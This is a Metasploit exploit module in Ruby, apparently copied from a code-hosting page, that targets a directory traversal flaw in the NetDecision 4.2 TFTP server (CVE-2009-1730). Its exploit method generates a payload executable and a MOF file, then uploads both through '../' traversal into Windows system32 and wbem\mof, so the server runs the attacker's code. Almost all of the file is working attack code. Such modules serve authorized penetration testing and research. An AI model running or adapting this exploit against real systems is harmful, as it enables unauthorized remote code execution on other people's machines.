Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
class MetasploitModule < Msf::Exploit::Remote
6
  Rank = ExcellentRanking
7

8
  include Rex::Proto::TFTP
9
  include Msf::Exploit::EXE
10
  include Msf::Exploit::WbemExec
11

12
  def initialize(info={})
13
    super(update_info(info,
14
      'Name'           => "NetDecision 4.2 TFTP Writable Directory Traversal Execution",
15
      'Description'    => %q{
16
          This module exploits a vulnerability found in NetDecision 4.2 TFTP server. The
17
        software contains a directory traversal vulnerability that allows a remote attacker
18
        to write arbitrary file to the file system, which results in code  execution under
19
        the context of user executing the TFTP Server.
20
      },
21
      'License'        => MSF_LICENSE,
22
      'Author'         =>
23
        [
24
          'Rob Kraus', # Vulnerability discovery
25
          'juan vazquez' # Metasploit module
26
        ],
27
      'References'     =>
28
        [
29
          ['CVE', '2009-1730'],
30
          ['OSVDB', '54607'],
31
          ['BID', '35002']
32
        ],
33
      'Payload'        =>
34
        {
35
          'BadChars' => "\x00",
36
        },
37
      'DefaultOptions'  =>
38
        {
39
          'EXITFUNC' => 'thread'
40
        },
41
      'Platform'       => 'win',
42
      'Targets'        =>
43
        [
44
          ['NetDecision 4.2 TFTP on Windows XP SP3 / Windows 2003 SP2', {}]
45
        ],
46
      'Privileged'     => false,
47
      'DisclosureDate' => '2009-05-16',
48
      'DefaultTarget'  => 0))
49

50
    register_options([
51
      OptInt.new('DEPTH', [false, "Levels to reach base directory",1]),
52
      OptAddress.new('RHOST', [true, "The remote TFTP server address"]),
53
      OptPort.new('RPORT', [true, "The remote TFTP server port", 69])
54
    ])
55
  end
56

57
  def upload(filename, data)
58
    tftp_client = Rex::Proto::TFTP::Client.new(
59
      "LocalHost"  => "0.0.0.0",
60
      "LocalPort"  => 1025 + rand(0xffff-1025),
61
      "PeerHost"   => datastore['RHOST'],
62
      "PeerPort"   => datastore['RPORT'],
63
      "LocalFile"  => "DATA:#{data}",
64
      "RemoteFile" => filename,
65
      "Mode"       => "octet",
66
      "Context"    => {'Msf' => self.framework, "MsfExploit" => self },
67
      "Action"     => :upload
68
    )
69

70
    ret = tftp_client.send_write_request { |msg| print_status(msg) }
71
    while not tftp_client.complete
72
      select(nil, nil, nil, 1)
73
      tftp_client.stop
74
    end
75
  end
76

77
  def exploit
78
    peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
79

80
    # Setup the necessary files to do the wbemexec trick
81
    exe_name = rand_text_alpha(rand(10)+5) + '.exe'
82
    exe      = generate_payload_exe
83
    mof_name = rand_text_alpha(rand(10)+5) + '.mof'
84
    mof      = generate_mof(mof_name, exe_name)
85

86
    # Configure how deep we want to traverse
87
    depth  = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
88
    levels = "../" * depth
89

90
    # Upload the malicious executable to C:\Windows\System32\
91
    print_status("#{peer} - Uploading executable (#{exe.length.to_s} bytes)")
92
    upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe)
93

94
    # Let the TFTP server idle a bit before sending another file
95
    select(nil, nil, nil, 1)
96

97
    # Upload the mof file
98
    print_status("#{peer} - Uploading .mof...")
99
    upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
100
  end
101
end
102

103